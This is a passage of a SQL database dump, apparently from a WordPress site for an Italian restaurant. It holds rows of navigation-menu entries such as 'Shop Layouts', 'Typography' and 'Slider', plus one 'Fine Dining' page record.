17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1247,NULL,NULL,3415,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1248,NULL,NULL,3416,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1249,NULL,NULL,3417,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1250,NULL,NULL,3418,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1251,NULL,NULL,3419,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1252,NULL,NULL,3420,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1253,NULL,NULL,3421,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1254,NULL,NULL,3422,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1255,NULL,NULL,3423,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1256,NULL,NULL,3424,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1257,NULL,NULL,3425,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1258,NULL,NULL,3426,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1259,NULL,NULL,3427,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1260,NULL,NULL,3428,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1261,NULL,NULL,3429,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1262,NULL,NULL,3430,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1263,NULL,NULL,3431,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1264,NULL,NULL,3432,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1265,NULL,NULL,3433,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1266,NULL,NULL,3434,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1267,NULL,NULL,3435,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1268,NULL,NULL,3436,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1269,NULL,NULL,3437,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1270,NULL,NULL,3438,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1271,NULL,NULL,3439,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1272,NULL,NULL,3440,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1273,'https://www.ristorantesolymar.it/vecchio/fine-dining-2/','55:330931bdcbbf49fd8bf5f17a969b50cc',3441,'post','page',1,0,NULL,NULL,'Fine Dining','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,11,NULL,NULL,'2020-12-06 17:47:43','2021-01-31 20:24:31',1,NULL,NULL,NULL,NULL,0,NULL),(1277,NULL,NULL,3444,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1278,NULL,NULL,3445,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1279,NULL,NULL,3446,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1280,NULL,NULL,3447,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1281,NULL,NULL,3448,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1282,NULL,NULL,3449,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1283,NULL,NULL,3450,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1284,NULL,NULL,3451,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1285,NULL,NULL,3452,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1286,NULL,NULL,3453,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1287,NULL,NULL,3454,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1288,NULL,NULL,3455,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1289,NULL,NULL,3456,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1290,NULL,NULL,3457,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1291,NULL,NULL,3458,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1292,NULL,NULL,3459,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1293,NULL,NULL,3460,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1294,NULL,NULL,3461,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1295,NULL,NULL,3462,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1296,NULL,NULL,3463,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1297,NULL,NULL,3464,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1298,NULL,NULL,3465,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1299,NULL,NULL,3466,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1300,NULL,NULL,3467,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1301,NULL,NULL,3468,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:46','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1302,NULL,NULL,3469,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1303,NULL,NULL,3470,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1304,NULL,NULL,3471,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1305,NULL,NULL,3472,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1306,NULL,NULL,3473,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1307,NULL,NULL,3474,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1308,NULL,NULL,3475,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1309,NULL,NULL,3476,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1310,NULL,NULL,3477,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1311,NULL,NULL,3478,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1312,NULL,NULL,3479,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1313,NULL,NULL,3480,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1314,NULL,NULL,3481,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1315,NULL,NULL,3482,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1316,NULL,NULL,3483,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1317,NULL,NULL,3484,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1318,NULL,NULL,3485,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1319,NULL,NULL,3486,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1320,NULL,NULL,3487,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1321,NULL,NULL,3488,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1322,NULL,NULL,3489,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1323,NULL,NULL,3490,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1324,NULL,NULL,3491,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1325,NULL,NULL,3492,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1326,NULL,NULL,3493,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1327,NULL,NULL,3494,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:47','2021-01-29 